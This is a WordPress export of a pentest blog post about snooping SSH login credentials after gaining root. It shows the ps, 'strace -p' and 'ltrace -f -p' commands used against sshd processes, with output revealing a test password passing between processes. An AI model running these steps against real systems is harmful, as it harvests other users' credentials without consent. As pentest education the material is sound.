{"id":16,"date":"2007-06-24T22:13:14","date_gmt":"2007-06-24T22:13:14","guid":{"rendered":"http:\/\/pentestmonkey.net\/?p=16"},"modified":"2011-08-20T16:02:54","modified_gmt":"2011-08-20T16:02:54","slug":"sshd-snooping","status":"publish","type":"post","link":"https:\/\/pentestmonkey.net\/blog\/sshd-snooping","title":{"rendered":"Stealing Usernames and Passwords from SSHD"},"content":{"rendered":"

I just read a really cool blog post<\/a> by Sebastian Krahmer. He discusses a post-exploitation technique to snoop on incomming SSH sessions – including the username and password used to authenticate.<\/p>\n

<\/p>\n

Sabastian discusses OpenSSH running with the “Privilege Separation” option turned on (the default).<\/p>\n

In this mode several sshd processes are created when an incomming connection is made.\u00a0 The lower-privileged process needs to send the supplied username and password to the higher-privilged process in order for it to be verified.\u00a0 It is during this inter-process communication where the snooping occurs.<\/p>\n

The proof-of-concept code attaches to the sshd process, waits for it fork, then traps system calls within the child process.\u00a0 When the child uses the “read” and “write” system calls to commicate with the parent process, the password is revealed.\u00a0 Screenshots are included in the orginal post<\/a>.<\/p>\n

We can recreate the process using a locally configured ssh daemon, an ssh client and the strace program to trap system calls.<\/p>\n

First we connect to the ssh daemon.\u00a0 This causes it to fork:<\/p>\n

$ ssh pm@localhost<\/pre>\n
Wait for “password:” prompt, then in another session look for the sshd [priv] process.<\/p>\n
# ps aux | grep ssh\r\nroot\u00a0\u00a0\u00a0\u00a0\u00a0 7015\u00a0 0.0\u00a0 0.0\u00a0 23720\u00a0\u00a0 456 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 Apr16\u00a0\u00a0 0:00 \/usr\/sbin\/sshd\r\npm\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 27870\u00a0 0.0\u00a0 0.0\u00a0 22584\u00a0 2056 pts\/5\u00a0\u00a0\u00a0 S+\u00a0\u00a0 19:44\u00a0\u00a0 0:00 ssh localhost\r\nroot\u00a0\u00a0\u00a0\u00a0 27871\u00a0 0.1\u00a0 0.0\u00a0 33476\u00a0 2172 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [priv]\r\nsshd\u00a0\u00a0\u00a0\u00a0 27872\u00a0 0.0\u00a0 0.0\u00a0 25060\u00a0\u00a0 888 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 S\u00a0\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [net]\r\nroot\u00a0\u00a0\u00a0\u00a0 27873\u00a0 0.0\u00a0 0.0\u00a0 33476\u00a0\u00a0 692 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 S\u00a0\u00a0\u00a0 19:44\u00a0\u00a0 0:00 sshd: pm [pam]<\/pre>\n
Now strace it (you need to be root).\u00a0 Then go back to the ssh client type in a password.\u00a0 You’ll see your password being passed between sshd processes…<\/p>\n
# strace -p 27871\r\nProcess 27871 attached - interrupt to quit\r\nread(6, \"???27\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4\r\nread(6, \"4???1???16verysecurepass\", 23) = 23\r\nwrite(4, \"???236\", 5)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 5\r\nwrite(4, \"???16verysecurepass\", 18) = 18\r\nwrite(6, \"????055\", 5)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 5\r\nwrite(6, \"???1\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4\r\nread(6, \"???1\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 4<\/pre>\n
The PoC automates this above process.\u00a0 Very cool.<\/p>\n
What if Privilege Separation isn’t being used?<\/h3>\n
If Privilege Separation is turned off the above technique doesn’t work because system calls aren’t used to send the unencrypted logon credentials.\u00a0 It’s possible to see credentials being passed around via library calls using the ltrace tool, though.\u00a0\u00a0 The password sent in this example was lots of xxxxx’s:<\/p>\n
# ps aux | grep sshd\r\n\u00a0root\u00a0\u00a0\u00a0\u00a0\u00a0 7640\u00a0 0.0\u00a0 0.0\u00a0\u00a0 5128\u00a0\u00a0 724 ?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ss\u00a0\u00a0 19:46\u00a0\u00a0 0:00 \/usr\/sbin\/sshd<\/pre>\n
# sudo ltrace -f -p 7640\r\n...\r\n[pid 7658] HMAC_Update(0xbfff88d8, 0x80ae4d8, 128, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 1\r\n[pid 7658] HMAC_Final(0xbfff88d8, 0x80a1260, 0, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 1\r\n[pid 7658] HMAC_CTX_cleanup(0xbfff88d8, 0x80a1260, 0, 0x4222f7a0, 0x7a4e3342)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfff88d8\r\n[pid 7658] memcpy(0xbfff899b, \"=\", 1)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfff899b\r\n[pid 7658] free(0x80aa708)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = <void>\r\n[pid 7658] memcpy(0xbfffa984, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfffa984\r\n[pid 7658] calloc(1, 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80aa708\r\n[pid 7658] memcpy(0xbfffa954, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0xbfffa954\r\n[pid 7658] malloc(34)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b4940\r\n[pid 7658] memcpy(0x80b4940, \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"..., 33)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b4940\r\n[pid 7658] malloc(4096)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8440\r\n[pid 7658] memcpy(0x80b8440, \"\", 4)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8440\r\n[pid 7658] memcpy(0x80b8444, \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"..., 33)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = 0x80b8444\r\n...<\/pre>\n
So what does it all mean?<\/h3>\n
If you get root on a box during a pentest, you can snoop on processes.\u00a0 No surprises or anything new here really.\u00a0 However, I though it was really cool to see a practical and relatively safe way of automating such snooping – no trojaning of binaries, no risky patching of programs in memory.\u00a0 Great post Sabastian.<\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
I just read a really cool blog post by Sebastian Krahmer. He discusses a post-exploitation technique to snoop on incomming SSH sessions – including the username and password used to authenticate.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[19,59],"_links":{"self":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16"}],"collection":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/comments?post=16"}],"version-history":[{"count":2,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16\/revisions"}],"predecessor-version":[{"id":149,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/16\/revisions\/149"}],"wp:attachment":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/media?parent=16"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/categories?post=16"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/tags?post=16"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}